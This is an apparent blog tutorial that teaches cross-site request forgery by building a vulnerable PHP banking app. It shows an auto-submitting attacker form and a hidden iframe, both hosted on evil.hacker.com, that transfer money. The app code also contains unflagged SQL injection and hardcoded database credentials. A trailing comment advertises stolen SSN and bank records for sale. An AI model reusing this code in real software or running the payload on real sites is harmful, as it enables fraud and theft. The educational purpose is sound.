Friday 12 June 2015

Cross-Site Request Forgery Attack: Example Application


In Cross-site request forgery (CSRF) attack, the attacker creates an innocuous-looking website that causes the user's browser to submit a request directly to the vulnerable application to perform some unintended action.

In this tutorial, we develop a web application which has a CSRF vulnerability. When a user logs into the application, a session is created for him. The attacker creates a malicious URL to exploit the CSRF vulnerability. When the user clicks on the malicious link, the script performs a privileged operation on the vulnerable web application.


Victim Web Server Name: meru.mycompany.com
Attacker Web Server : evil.hacker.com


1) The user logs in to the application by viewing the URL  http://meru.mycompany.com/login.html. Enters username and password. On successful authentication, a session is created for the user. And the user is redirected to the URL http://meru.mycompany.com/transfer.php.








2) On the  page 'transfer.php' , the user specifies the account no. of the recipient and the amount to transfer. 


 The page 'transfer.php' contains the following code:

<?php
session_start();
?>
<html>
<body>
<?php
if(!isset($_SESSION['loginid'])){
  echo "please login";
}else{
?>
<h2>Enter Transaction details</h2> 
<form action="perform.php" method="post">
<label>To account no:</label>
<input type="text" name="daccount"  /> <br/>
<label>Transfer Amount:</label> 
<input type="text" name="amount"  /> <br/>
<input type="submit" name="submit" value="submit"/>
</form>
<?php
}
?>
</body>
</html>


We can see that the  above code is vulnerable to CSRF attack because of the following reasons:
a) The application relies solely on HTTP cookies for tracking sessions.
b) The attacker can determine all the parameters required to perform the action.

3) The attacker constructs a web page 'http://evil.hacker.com/attacker.php' that makes a cross-domain request to the vulnerable application containing everything needed to perform the privileged action. As shown below:

<html>
<body>
<form action="http://meru.mycompany.com/perform.php" method="post">
<input type="hidden" name="daccount" value="1050" /> <br/>
<input type="hidden" name="amount" value="1000" /> <br/>
</form>
<script>document.forms[0].submit();
</script>
</body>
</html>


This attack places all the parameters to the request into hidden form fields and contains a script to automatically submit the form.

4) The attacker puts this page on his web server and tricks the user into clicking on the link http://evil.hacker.com/attacker.php, while the user is already logged-in to the vulnerable application.

When the user's browser submits the form, it automatically adds the user's cookies for the target domain, and the vulnerable application processes the request in the usual way and money is transferred to the attacker's account.


The attacker can also use an iframe to launch the attack, as shown below. The advantage of using an iframe is that the output from the victim server is hidden to the user and the user will not come to know that he has been attacked.

iframe_attack.php
<html>
<body>
<iframe height="0" width="0" src='http://evil.hacker.com/attacker.php'></iframe>
</body>
</html>

In the above case, the user has to click on http://evil.hacker.com/iframe_attack.php.


5) The source code for the application is given below:

 login.php
<?php

if(!isset($_SESSION['loginid'])){
if(isset($_POST['submit'])){
  $loginid = $_POST['loginid'];
  $passwd = $_POST['passwd'];

  $conn = new mysqli('localhost','shabbir','shabbir','mybank');
  if($conn->connect_error){
    die('error connecting to server' . $conn->connect_error);
  }


  $sql = "select loginid,passwd,custname from customer where loginid = '$loginid' and passwd = '$passwd'";

  $result = $conn->query($sql);

  if ($result->num_rows == 1){
    $row = $result->fetch_assoc();
    $custname = $row['custname'];

    session_start();
    $_SESSION['loginid'] = $loginid;
    $_SESSION['custname'] = $custname;

    header('Location: transfer.php');
  }
  $error_msg="invalid username or password.\n";

  $conn->close();
}
}
?>


<html>
<head>
<title>Welcome to mybank</title>
</head>

<body>
<h2>Enter login details</h2>
<?php
if(! empty($error_msg)){
        echo "<strong>" . $error_msg . "</strong><br/>";
}
?>

<form action="login.php" method="post">

<label>Login id:</label>
<input type="text" name="loginid"  /> <br/>

<label>Password:</label>
<input type="text" name="passwd"  /> <br/>

<input type="submit" name="submit" value="submit"/>
</form>
</body>
</html>


perform.php
<?php
session_start();
if(!isset($_SESSION['loginid'])){
  echo "please login";
}else{

   $daccount = $_POST['daccount'];
   $amount = $_POST['amount'];
   $loginid = $_SESSION['loginid'];

   $conn = new mysqli('localhost','shabbir','shabbir','mybank');
   if($conn->connect_error){
      die('error connecting to server' . $conn->connect_error);
   }


   $sql1 = "select * from customer where loginid = '$loginid'";
   $result = $conn->query($sql1);

   if($result->num_rows > 0){
     $row = $result->fetch_assoc();
     $sbalance = $row['balance'];
     $sbalance = $sbalance - $amount;
     echo $sbalance;
   }else{
     echo "0 results";
   }

   $sql1 = "select * from customer where accountno = '$daccount'";
   $result = $conn->query($sql1);
 if($result->num_rows > 0){
     $row = $result->fetch_assoc();
     $dbalance = $row['balance'];
     $dbalance = $dbalance + $amount;
     echo $dbalance;
   }else{
     echo "0 results";
   }

   $sql1 = "update customer set balance = $sbalance where loginid = '$loginid'";
   if($conn->query($sql1) == TRUE){
        echo "inserted successfully";
   }
   else{
        echo "error quering database" . $conn->error;
   }
   $sql1 = "update customer set balance = $dbalance where accountno = '$daccount'";
   if($conn->query($sql1) == TRUE){
        echo "inserted successfully";
   }
   else{
        echo "error quering database" . $conn->error;
   }

  $conn->close();

}
?>





1 comment:

  1. Hi All!

    I'm selling fresh & genuine SSN Leads, with good connectivity. All data properly checked & verified.
    Headers in Leads:

    First Name | Last Name | SSN | Dob | Address | State | City | Zip | Phone Number | Account Number | Bank Name | DL Number | Routing Number | IP Address | Reference | Email | Rental/Owner |

    *You can ask for sample before any deal
    *Each lead will be cost $1
    *Premium Lead will be cost $5
    *If anyone wants in bulk I will negotiate
    *Sampling is just for serious buyers

    Hope for the long term deal
    For detailed information please contact me on:

    Whatsapp > +923172721122
    email > leads.sellers1212@gmail.com
    telegram > @leadsupplier
    ICQ > 752822040

    ReplyDelete